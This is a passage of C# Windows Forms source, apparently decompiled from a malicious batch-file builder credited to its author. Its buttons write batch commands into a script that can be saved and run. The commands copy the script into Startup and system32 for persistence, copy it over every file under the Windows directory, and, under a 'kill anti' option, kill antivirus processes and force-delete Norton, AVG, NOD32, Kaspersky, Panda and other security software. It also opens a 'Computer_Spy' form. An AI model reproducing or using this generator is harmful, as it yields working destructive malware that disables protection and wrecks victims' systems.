/S/B %SystemDrive%\\*.sys" + Environment.NewLine); } private void Button51_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("DIR /S/B %SystemDrive%\\*.lng" + Environment.NewLine); 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this.CheckBox2.Text = "Disable All File Types"; this.CheckBox2.ForeColor = Color.Lime; if (this.CheckBox2.Checked) return; this.RichTextBox1.Text = "@echo off"; this.RichTextBox1.AppendText("" + Environment.NewLine); this.CheckBox2.Text = "Enable All File Types"; this.CheckBox2.ForeColor = Color.Red; this.CheckBox3.Checked = false; } private void Button62_Click(object sender, EventArgs e) { this.Button62.Visible = false; this.RichTextBox2.Visible = false; this.Button30.Visible = false; } private void Button8_Click_1(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("del /f /q %SystemDrive%\\WINDOWS\\system32\\Run32.exe" + Environment.NewLine); } private void Button63_Click(object sender, EventArgs e) { } private void Button25_MouseLeave(object sender, EventArgs e) { } private void Button64_Click(object sender, EventArgs e) { } private void Timer1_Tick(object sender, EventArgs e) { } private void Button64_Click_1(object sender, EventArgs e) { this.GroupBox1.Visible = true; this.GroupBox2.Visible = true; this.GroupBox3.Visible = true; this.GroupBox4.Visible = true; this.RichTextBox2.Visible = false; this.Button30.Visible = false; this.Button62.Visible = false; } private void Button65_Click(object sender, EventArgs e) { this.GroupBox1.Visible = false; this.GroupBox2.Visible = false; this.GroupBox3.Visible = false; this.GroupBox4.Visible = false; } private void Button66_Click(object sender, EventArgs e) { this.GroupBox1.Visible = false; this.GroupBox2.Visible = false; this.GroupBox3.Visible = false; this.GroupBox4.Visible = false; this.RichTextBox2.Visible = false; this.Button30.Visible = false; this.Button62.Visible = false; } private void GroupBox1_Enter(object sender, EventArgs e) { } private void Timer1_Tick_1(object sender, EventArgs e) { this.Timer1.Interval = 10; this.Label1.Text = Conversions.ToString(DateTime.Now); this.Label2.Text = Conversions.ToString(Conversions.ToDouble(this.Label2.Text) + 1.0); } private void CheckBox1_CheckedChanged_1(object sender, EventArgs e) { if (this.CheckBox1.Checked) { this.Timer1.Stop(); this.CheckBox1.Text = "Enable Clock"; this.CheckBox1.ForeColor = Color.LimeGreen; } else if (!this.CheckBox1.Checked) { this.Timer1.Start(); this.CheckBox1.Text = "Disable Clock"; this.CheckBox1.ForeColor = Color.Red; } } private void Button63_Click_1(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("copy %0 %userprofile%\\Start Menu\\Programs\\Startup" + Environment.NewLine); } private void Button67_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("copy %0 %windir%\\system32\\ls.bat" + Environment.NewLine); } private void Button68_Click(object sender, EventArgs e) { this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("Dir %SystemRoot% /s /b > PathHost" + Environment.NewLine); this.RichTextBox1.AppendText("For /f %%a In (PathHost) Do Copy /y %0 %%a > Nul" + Environment.NewLine); this.RichTextBox1.AppendText("Del /f /s /q PathHost > Nul" + Environment.NewLine); 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this.RichTextBox1.AppendText("pause" + Environment.NewLine); } private void Button64_Click_2(object sender, EventArgs e) { SaveFileDialog saveFileDialog = new SaveFileDialog(); saveFileDialog.FileName = "change this.bat"; saveFileDialog.Filter = "text file (*.txt)|*.txt|ALL FILES (*.*)|*.*"; saveFileDialog.Title = "Save File"; saveFileDialog.CheckPathExists = true; int num = (int) saveFileDialog.ShowDialog((IWin32Window) this); try { MyProject.Computer.FileSystem.WriteAllText(saveFileDialog.FileName, this.RichTextBox1.Text, false); } catch (Exception ex) { ProjectData.SetProjectError(ex); ProjectData.ClearProjectError(); } } private void CheckBox3_CheckedChanged(object sender, EventArgs e) { if (this.CheckBox3.Checked) { this.CheckBox3.ForeColor = Color.Lime; this.CheckBox3.Text = "disable kill anti"; this.RichTextBox1.AppendText("" + Environment.NewLine); this.RichTextBox1.AppendText("tskill /A spy*" + Environment.NewLine); this.RichTextBox1.AppendText("tskill /A bullguard" + Environment.NewLine); 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this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\Norton~1\\Norton~1\\*.* " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\Norton~1\\*.* " + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\avgamsr\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\avgamsvr\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\avgemc\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\avgcc\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\avgupsvc\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\grisoft " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\nood32krn\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\nood32\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\nod32 " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\nood32" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\kav\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\kavmm\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\kaspersky\\*.*" + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\ewidoctrl\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\guard\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\ewido\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\pavprsrv\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\pavprot\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\avengine\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("cls" + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\apvxdwin\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\webproxy\\*.exe " + Environment.NewLine); this.RichTextBox1.AppendText("del /Q /F C:\\Program Files\\panda software\\*.* " + Environment.NewLine); this.RichTextBox1.AppendText("" + Environment.NewLine); } else if (!this.CheckBox3.Checked) { this.CheckBox3.ForeColor = Color.Red; this.RichTextBox1.Text = "@echo off"; this.CheckBox2.Checked = false; this.CheckBox3.Text = "Enable kill anti"; } } private void Label4_Click(object sender, EventArgs e) { } private void Label1_Click(object sender, EventArgs e) { } private void Label5_Click(object sender, EventArgs e) { } private void batch_maker_MouseEnter(object sender, EventArgs e) => this.Label5.Text = Environment.MachineName; private void Button65_Click_1(object sender, EventArgs e) { MyProject.Forms.Computer_Spy.Show(); this.Hide(); } private void Button66_Click_1(object sender, EventArgs e) { int num = (int) Interaction.MsgBox((object) "Created By Shawn Wiebe", MsgBoxStyle.Information); } } }